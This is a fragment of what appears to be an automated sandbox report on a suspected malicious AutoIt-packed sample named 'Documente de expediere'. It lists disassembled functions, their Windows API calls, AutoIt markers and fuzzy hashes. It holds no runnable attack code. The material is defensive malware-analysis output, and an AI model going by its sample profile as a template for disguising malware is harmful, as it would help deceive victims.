                                                • Opcode Fuzzy Hash: fc8f1a43d92b409a9fc3443f05f08a35b7dbde12cca23af92c4c83ca62f6b31d
                                                • Instruction Fuzzy Hash: 58620934A14658DBEB24CFA4C880BDEB772FF58304F1091A9D20DEB294E7759E81CB59
                                                Function 006F97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00695045: _fseek.LIBCMT ref: 0069505D
                                                  • Part of subcall function 006F99BE: _wcscmp.LIBCMT ref: 006F9AAE
                                                  • Part of subcall function 006F99BE: _wcscmp.LIBCMT ref: 006F9AC1
                                                • _free.LIBCMT ref: 006F992C
                                                • _free.LIBCMT ref: 006F9933
                                                • _free.LIBCMT ref: 006F999E
                                                  • Part of subcall function 006B2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,006B9C64), ref: 006B2FA9
                                                  • Part of subcall function 006B2F95: GetLastError.KERNEL32(00000000,?,006B9C64), ref: 006B2FBB
                                                • _free.LIBCMT ref: 006F99A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                • String ID:
                                                • API String ID: 1552873950-0
                                                • Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                                                • Instruction ID: 98de847fef20c4ab69d09ed63017db86c9c7cc886b7bc16a23d9306df887b93e
                                                • Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
                                                • Instruction Fuzzy Hash: 5F515FB1D04618AFDF649F64CC45BEEBBBAEF48300F0404AEB209A7241DB715A90CF58
                                                Function 006B493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                • Instruction ID: 7b906712dce17f3541b429e6e263995836f367ab167ced940005238b76605009
                                                • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                • Instruction Fuzzy Hash: 3C41A4B16407059BDB289EA9C8809EF7BABEF80360B24816DE855C7746EF719DC18B44
                                                Function 00694DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: AU3!P/r$EA06
                                                • API String ID: 4104443479-480415842
                                                • Opcode ID: 59e080215525e4ddf7ea3431330851bd6b6a725e9cbd59d12f51cd6dffdcce80
                                                • Instruction ID: ac976e57409826b3d0b6ed0c32bab0e628f835dac83fbb95c36a710d6add1a92
                                                • Opcode Fuzzy Hash: 59e080215525e4ddf7ea3431330851bd6b6a725e9cbd59d12f51cd6dffdcce80
                                                • Instruction Fuzzy Hash: FF416C71A045545BDF129B648851FFE7FAFAF41300F184168E8429B782DD219D8783A1
                                                Function 006973E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 006CEE62
                                                • GetOpenFileNameW.COMDLG32(?), ref: 006CEEAC
                                                  • Part of subcall function 006948AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006948A1,?,?,006937C0,?), ref: 006948CE
                                                  • Part of subcall function 006B09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006B09F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                • String ID: X
                                                • API String ID: 3777226403-3081909835
                                                • Opcode ID: 5bf7124ce611fc53a7fe8213c525e79b5ac9d073abb884c8da280b25e3ec33fe
                                                • Instruction ID: 9a671b15120e84203755e5e55b51ac66a6eb089d1bb61dee5551d28c505d7f6d
                                                • Opcode Fuzzy Hash: 5bf7124ce611fc53a7fe8213c525e79b5ac9d073abb884c8da280b25e3ec33fe
                                                • Instruction Fuzzy Hash: 0221C670A102589BDF51DF94C845BEE7BFE9F49710F00805EE508E7281DBB85A8E8F95
                                                Function 006F901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: 295f2a48863edf15225debf3473937e1f88605cfee114ccdde9e9acf201298fd
                                                • Instruction ID: bf28fd7bee8313085ca68433d2813c47b4e72b86389c1840ca3496b29b078652
                                                • Opcode Fuzzy Hash: 295f2a48863edf15225debf3473937e1f88605cfee114ccdde9e9acf201298fd
                                                • Instruction Fuzzy Hash: F801B9B19042687EDB68C6A8C856FFE7BF89B15301F00419EF552D6181E975A6048B64
                                                Function 006F9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 006F9B82
                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006F9B99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Temp$FileNamePath
                                                • String ID: aut
                                                • API String ID: 3285503233-3010740371
                                                • Opcode ID: 125aa020f4df4be0523d83c687d1dc5f2bd503699fe8256d75428ca1f98d9ee7
                                                • Instruction ID: 924a4a420ddc12c42f3efd317599d2e681d5d48b840d8689beb9d2db7c7c9dd5
                                                • Opcode Fuzzy Hash: 125aa020f4df4be0523d83c687d1dc5f2bd503699fe8256d75428ca1f98d9ee7
                                                • Instruction Fuzzy Hash: 3CD0177958030EABDA10AA989C0EFDA776CA704700F0082A1FA54920A1DAB855988A95
                                                Function 0070CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c2299d552405aadc0c1446f10a4b46aa60042259be9e1068040e8b51725bd428
                                                • Instruction ID: 41fbfd624a1d76822ece39774cba5581ce91ec3eee9c16fdde84b3d04ddf4444
                                                • Opcode Fuzzy Hash: c2299d552405aadc0c1446f10a4b46aa60042259be9e1068040e8b51725bd428
                                                • Instruction Fuzzy Hash: 88F12571608301DFCB24DF68C484A6ABBE5FF88314F148A2DF8999B291D735E945CF92
                                                Function 006B594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 006B5963
                                                  • Part of subcall function 006BA3AB: __NMSG_WRITE.LIBCMT ref: 006BA3D2
                                                  • Part of subcall function 006BA3AB: __NMSG_WRITE.LIBCMT ref: 006BA3DC
                                                • __NMSG_WRITE.LIBCMT ref: 006B596A
                                                  • Part of subcall function 006BA408: GetModuleFileNameW.KERNEL32(00000000,007543BA,00000104,?,00000001,00000000), ref: 006BA49A
                                                  • Part of subcall function 006BA408: ___crtMessageBoxW.LIBCMT ref: 006BA548
                                                  • Part of subcall function 006B32DF: ___crtCorExitProcess.LIBCMT ref: 006B32E5
                                                  • Part of subcall function 006B32DF: ExitProcess.KERNEL32 ref: 006B32EE
                                                  • Part of subcall function 006B8D68: __getptd_noexit.LIBCMT ref: 006B8D68
                                                • RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,006B1013,?), ref: 006B598F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                • Opcode ID: b2b79421039ea69c70f3c69d79a0cbd697e1928921e0db896c0e568004d94b5c
                                                • Instruction ID: 2e364ae7acd67e94f9371718ee57f81ae034588271ef47264c52422f612f71a2
                                                • Opcode Fuzzy Hash: b2b79421039ea69c70f3c69d79a0cbd697e1928921e0db896c0e568004d94b5c
                                                • Instruction Fuzzy Hash: 0201D2B2340B65DEE6613B64E842BEE728B9F41771F10002EF5069B2C1DAB49DC19369
                                                Function 006F9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006F97D2,?,?,?,?,?,00000004), ref: 006F9B45
                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006F97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006F9B5B
                                                • CloseHandle.KERNEL32(00000000,?,006F97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006F9B62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                • Opcode ID: b4bde4490bbbc83d3af6bdfea77683cfe3052898e610f8cb928ef8f3de8501ed
                                                • Instruction ID: de4dd1cef078b1173171bb114769ddfee0f5219b640fd2c241e91ffacb814ff9
                                                • Opcode Fuzzy Hash: b4bde4490bbbc83d3af6bdfea77683cfe3052898e610f8cb928ef8f3de8501ed
                                                • Instruction Fuzzy Hash: 08E08632180618B7D7211B58EC09FDA7F29AB05761F10C220FB24690E0C7B56511979C
                                                Function 006F8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 006F8FA5
                                                  • Part of subcall function 006B2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,006B9C64), ref: 006B2FA9
                                                  • Part of subcall function 006B2F95: GetLastError.KERNEL32(00000000,?,006B9C64), ref: 006B2FBB
                                                • _free.LIBCMT ref: 006F8FB6
                                                • _free.LIBCMT ref: 006F8FC8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                                                • Instruction ID: 09a08b6ec7a4234c574c3ffbd5a510793c1e655b81fb53c1f6d7124b8669b9a5
                                                • Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                                                • Instruction Fuzzy Hash: 05E012E161A7064ECA64A978AD54AF357EF5F48390718085DB509DB243DE24E8918228
                                                Function 0069AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CALL
                                                • API String ID: 0-4196123274
                                                • Opcode ID: 8d2e240b1ea31fcfdc4e03cef47b23766f3c2b3facfff9806c318d1924a489ce
                                                • Instruction ID: 989d12a49935f37f5f16539cc77827c83ed0d30a191599f87fef3aa499e4a241
                                                • Opcode Fuzzy Hash: 8d2e240b1ea31fcfdc4e03cef47b23766f3c2b3facfff9806c318d1924a489ce
                                                • Instruction Fuzzy Hash: 24225670508341DFDB64DF54C494BAABBE6BF85300F14895DE88A8B762DB31EC85CB86
                                                Function 0069492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 00694992
                                                  • Part of subcall function 006B35AC: __lock.LIBCMT ref: 006B35B2
                                                  • Part of subcall function 006B35AC: DecodePointer.KERNEL32(00000001,?,006949A7,006E81BC), ref: 006B35BE
                                                  • Part of subcall function 006B35AC: EncodePointer.KERNEL32(?,?,006949A7,006E81BC), ref: 006B35C9
                                                  • Part of subcall function 00694A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00694A73
                                                  • Part of subcall function 00694A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00694A88
                                                  • Part of subcall function 00693B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00693B7A
                                                  • Part of subcall function 00693B4C: IsDebuggerPresent.KERNEL32 ref: 00693B8C
                                                  • Part of subcall function 00693B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,007562F8,007562E0,?,?), ref: 00693BFD
                                                  • Part of subcall function 00693B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00693C81
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006949D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                • String ID:
                                                • API String ID: 1438897964-0
                                                • Opcode ID: 64f9baf00aa365c4e10c05341f792a6890dcac52bbb4fdebc84d52000031f087
                                                • Instruction ID: 4fd41446b949a8a88cd8d962da951fc68af4d880ec91087d37756a62b1b3d5a5
                                                • Opcode Fuzzy Hash: 64f9baf00aa365c4e10c05341f792a6890dcac52bbb4fdebc84d52000031f087
                                                • Instruction Fuzzy Hash: 79119A719083119FCB00EF29EC0598AFBE9FB98711F00851EF045832B1DBB49A46CB9A
                                                Function 00695DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00695981,?,?,?,?), ref: 00695E27
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00695981,?,?,?,?), ref: 006CE19C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: a1d3f1d58bb047e111e6a8b81a0cf7a256309d83a48d6dc04c8d09622433cc1e
                                                • Instruction ID: d1148609103dd10b7d067ad8ecc20d9a7a5c3ad64cc57cd06b83ddf8c68224cf
                                                • Opcode Fuzzy Hash: a1d3f1d58bb047e111e6a8b81a0cf7a256309d83a48d6dc04c8d09622433cc1e
                                                • Instruction Fuzzy Hash: AB01B970244708BEF7250E14CC8AFB6379DEB01768F10C319FAE65A6E0C6B55D458B54
                                                Function 006B0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006B594C: __FF_MSGBANNER.LIBCMT ref: 006B5963
                                                  • Part of subcall function 006B594C: __NMSG_WRITE.LIBCMT ref: 006B596A
                                                  • Part of subcall function 006B594C: RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,006B1013,?), ref: 006B598F
                                                • std::exception::exception.LIBCMT ref: 006B102C
                                                • __CxxThrowException@8.LIBCMT ref: 006B1041
                                                  • Part of subcall function 006B87DB: RaiseException.KERNEL32(?,?,?,0074BAF8,00000000,?,?,?,?,006B1046,?,0074BAF8,?,00000001), ref: 006B8830
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 3902256705-0
                                                • Opcode ID: b442b225ed40598cf7f214c4004eef4fa346394b3515058ffcbcf9729539e155
                                                • Instruction ID: 1879ad228aa00b67ab5e0e584824c486931516deaec6e9557dd077c1f50455f7
                                                • Opcode Fuzzy Hash: b442b225ed40598cf7f214c4004eef4fa346394b3515058ffcbcf9729539e155
                                                • Instruction Fuzzy Hash: E4F0F4B564022DB6CB20BA58EC159DF7BAE9F01350F60002AF80497282EFB0CBC1C398
                                                Function 006B582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __lock_file_memset
                                                • String ID:
                                                • API String ID: 26237723-0
                                                • Opcode ID: f32289b4035ec0d7a1d0d82b653b05b992d55f800aba7c9e516641c8b5bea9a7
                                                • Instruction ID: 6ce6fab890d0e0a930fa1b45622ed1e0938bdd60c259b7589ee03b2c4420ccba
                                                • Opcode Fuzzy Hash: f32289b4035ec0d7a1d0d82b653b05b992d55f800aba7c9e516641c8b5bea9a7
                                                • Instruction Fuzzy Hash: D901D4F1900618EBCF52BF69CC01ADE7B67AF80360F044219F8141B2A1DB31CA92DB95
                                                Function 006B55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006B8D68: __getptd_noexit.LIBCMT ref: 006B8D68
                                                • __lock_file.LIBCMT ref: 006B561B
                                                  • Part of subcall function 006B6E4E: __lock.LIBCMT ref: 006B6E71
                                                • __fclose_nolock.LIBCMT ref: 006B5626
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: 5157e1b1016794e706731eb1613589788680b717a1da820013e84c0a36fcfb92
                                                • Instruction ID: b25dbda1057ec606ad94e4afcc9d1cb0995e72875df290889c9321c32f36232d
                                                • Opcode Fuzzy Hash: 5157e1b1016794e706731eb1613589788680b717a1da820013e84c0a36fcfb92
